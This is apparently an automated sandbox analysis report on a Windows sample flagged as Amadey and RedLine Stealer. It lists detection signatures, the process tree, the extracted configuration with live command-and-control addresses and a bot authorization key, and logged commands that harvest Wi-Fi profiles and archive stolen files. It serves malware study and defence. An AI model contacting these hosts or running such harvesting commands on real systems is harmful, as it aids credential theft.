Edit tour

Windows Analysis Report
yINR7uQlPr.exe

Overview

General Information

Sample name:	yINR7uQlPr.exe renamed because original name is a hash value
Original sample name:	1bbc3bff13812c25d47cd84bca3da2dc.exe
Analysis ID:	1574171
MD5:	1bbc3bff13812c25d47cd84bca3da2dc
SHA1:	d3406bf8d0e9ac246c272fa284a35a3560bdbff5
SHA256:	0a17e2ca8f223de67c0864fac1d24c7bb2d0c796c46e9ce04e4dff374c577ea1
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

Amadey, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected RedLine Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Changes the view of files in windows explorer (hidden files and folders)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Contains functionality to start a terminal service

Creates a thread in another existing process (thread injection)

Found API chain indicative of debugger detection

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Instant Messenger accounts or passwords

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

yINR7uQlPr.exe (PID: 3332 cmdline: "C:\Users\user\Desktop\yINR7uQlPr.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)

svchost.exe (PID: 2888 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

1DC30FADAFF92643095942.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)

svchost.exe (PID: 5576 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

audiodg.exe (PID: 5304 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

msiexec.exe (PID: 2228 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

CC11.tmp.ctx.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)

CC11.tmp.ctx.exe (PID: 4160 cmdline: "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)

1DC30FADAFF92643095942.exe (PID: 3876 cmdline: "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe" MD5: 1BBC3BFF13812C25D47CD84BCA3DA2DC)

svchost.exe (PID: 6596 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

audiodg.exe (PID: 5840 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

msiexec.exe (PID: 6572 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

D7AB.tmp.ssg.exe (PID: 4444 cmdline: "C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)

EC2F.tmp.gfx.exe (PID: 3348 cmdline: "C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)

Gxtuum.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)

audiodg.exe (PID: 4204 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

msiexec.exe (PID: 2656 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

Gxtuum.exe (PID: 3408 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)

rundll32.exe (PID: 5340 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 2164 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

netsh.exe (PID: 6256 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6624 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 6020 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6664 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

netsh.exe (PID: 1268 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6176 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 3876 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 1248 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

update.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Local\Temp\10000820101\update.exe" MD5: DD1E3F38AE7711D270748012AF613950)

svchost.exe (PID: 5596 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

audiodg.exe (PID: 5608 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

msiexec.exe (PID: 6616 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

update.exe (PID: 2452 cmdline: "C:\Users\user\AppData\Local\Temp\10000830101\update.exe" MD5: DD1E3F38AE7711D270748012AF613950)

svchost.exe (PID: 6632 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

audiodg.exe (PID: 5012 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)

msiexec.exe (PID: 3228 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)

ssg.exe (PID: 2640 cmdline: "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}

Threatname: RedLine

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002C.00000002.3006898229.00000000034C6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3dddd:$s2: ReflectiveLoader@
00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
Process Memory Space: explorer.exe PID: 1028	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: D7AB.tmp.ssg.exe PID: 4444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: D7AB.tmp.ssg.exe PID: 4444	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.0.D7AB.tmp.ssg.exe.5c0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.2.Gxtuum.exe.7a0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
20.2.Gxtuum.exe.7a0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
4.0.explorer.exe.3320000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5dd:$s2: ReflectiveLoader@
1.2.svchost.exe.17002c7d000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5dd:$s2: ReflectiveLoader@
19.0.Gxtuum.exe.7a0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
18.2.EC2F.tmp.gfx.exe.690000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
4.0.explorer.exe.3320000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
30.2.rundll32.exe.69710000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
29.2.rundll32.exe.69710000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
4.2.explorer.exe.9820000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
4.2.explorer.exe.3320000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
20.0.Gxtuum.exe.7a0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
4.2.explorer.exe.3320000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5dd:$s2: ReflectiveLoader@
18.0.EC2F.tmp.gfx.exe.690000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
4.2.explorer.exe.9820000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3dddd:$s2: ReflectiveLoader@
4.2.explorer.exe.ca78220.2.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b5dd:$s2: ReflectiveLoader@
1.2.svchost.exe.17002c7d000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
4.2.explorer.exe.ca78220.2.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3c9dd:$s2: ReflectiveLoader@
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6664, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6176, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yINR7uQlPr.exe, ProcessId: 3332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6664, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6176, ProcessName: powershell.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\yINR7uQlPr.exe", ParentImage: C:\Users\user\Desktop\yINR7uQlPr.exe, ParentProcessId: 3332, ParentProcessName: yINR7uQlPr.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2888, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 6664, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6176, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\yINR7uQlPr.exe", ParentImage: C:\Users\user\Desktop\yINR7uQlPr.exe, ParentProcessId: 3332, ParentProcessName: yINR7uQlPr.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2888, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 2164, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6256, ProcessName: netsh.exe

Suricata Signatures

ET MALWARE Amadey Bot Activity (POST) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:36.421957+0100	2044597	1	A Network Trojan was detected	192.168.2.5	49775	185.81.68.147	80	TCP
2024-12-13T01:37:39.825443+0100	2044597	1	A Network Trojan was detected	192.168.2.5	49792	185.81.68.148	80	TCP

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:27.096738+0100	2043234	1	A Network Trojan was detected	185.81.68.147	1912	192.168.2.5	49738	TCP
2024-12-13T01:38:05.490439+0100	2043234	1	A Network Trojan was detected	185.81.68.147	1912	192.168.2.5	49876	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:26.656312+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:32.149745+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:33.161554+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:33.618848+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:34.850542+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:35.288592+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:35.765758+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:36.213761+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:36.859262+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:37.364802+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:38.264018+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:39.039789+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:39.159660+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:40.750025+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:41.311807+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:41.758939+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:42.214100+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:42.925495+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:43.439327+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:43.879129+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
